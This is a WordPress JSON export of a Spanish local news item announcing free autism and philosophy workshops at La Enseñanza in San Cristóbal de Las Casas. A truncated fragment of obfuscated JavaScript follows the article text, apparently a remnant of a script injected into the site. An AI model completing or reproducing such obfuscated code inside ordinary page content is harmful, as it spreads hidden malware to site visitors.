{"id":18170,"date":"2024-10-03T02:42:46","date_gmt":"2024-10-03T02:42:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18170"},"modified":"2024-10-03T02:42:47","modified_gmt":"2024-10-03T02:42:47","slug":"ofrecen-talleres-gratuitos-sobre-autismo-y-filosofia-en-la-ensenanza","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18170","title":{"rendered":"Ofrecen talleres gratuitos sobre Autismo y Filosof\u00eda en La Ense\u00f1anza"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"546\" data-id=\"18171\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0013-1024x546.jpg\" alt=\"\" class=\"wp-image-18171\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0013-1024x546.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0013-300x160.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0013-768x410.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0013-310x165.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/10\/IMG-20241002-WA0013.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>2 de octubre del 2024. San Crist\u00f3bal de Las Casas.- A partir de este s\u00e1bado, La Ense\u00f1anza abrir\u00e1 sus puertas para ofrecer dos talleres gratuitos dirigidos a todo el p\u00fablico. En entrevista, Lidia Gopar, directora del espacio cultural, coment\u00f3 que las actividades buscan brindar formaci\u00f3n y sensibilizaci\u00f3n sobre temas fundamentales en la sociedad actual.<\/p>\n\n\n\n<p>El primero de los talleres, titulado &#8220;Hablemos de Autismo&#8221;, estar\u00e1 a cargo de la especialista Lola Hern\u00e1ndez. Gopar destac\u00f3 que las personas interesadas deber\u00e1n registrarse previamente. &#8220;Pueden llamar a La Ense\u00f1anza para proporcionar los datos e informaci\u00f3n necesaria para formar parte de este taller, el n\u00famero es 442 436 15 51, ah\u00ed pueden hacer el registro&#8221;.<\/p>\n\n\n\n<p>Por otro lado, el taller de Filosof\u00eda, titulado &#8220;C\u00f3mo habitar el siglo XXI&#8221;, tambi\u00e9n comenzar\u00e1 este s\u00e1bado 5 de octubre. &#8220;Este espacio est\u00e1 dirigido al p\u00fablico en general y busca ofrecer herramientas para reflexionar sobre los desaf\u00edos del mundo contempor\u00e1neo. Para inscribirse, los interesados pueden ingresar a la p\u00e1gina de La Ense\u00f1anza en Facebook, donde encontrar\u00e1n un c\u00f3digo QR que les permitir\u00e1 registrarse. Tambi\u00e9n se puede llamar directamente a las oficinas&#8221;.<\/p>\n\n\n\n<p>&#8220;Ambos talleres forman parte del compromiso de La Ense\u00f1anza con la difusi\u00f3n del conocimiento y la formaci\u00f3n de la comunidad, ofreciendo espacios de aprendizaje accesibles y gratuitos&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 2 de octubre del 2024. San Crist\u00f3bal de Las Casas.- A partir de este s\u00e1bado, La Ense\u00f1anza abrir\u00e1 sus puertas para ofrecer dos talleres gratuitos dirigidos a todo el p\u00fablico. En entrevista, Lidia Gopar, directora del espacio cultural, coment\u00f3 que las actividades buscan brindar formaci\u00f3n y sensibilizaci\u00f3n sobre temas fundamentales en la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18171,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-18170","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18170"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18170\/revisions"}],"predecessor-version":[{"id":18172,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18170\/revisions\/18172"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18171"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}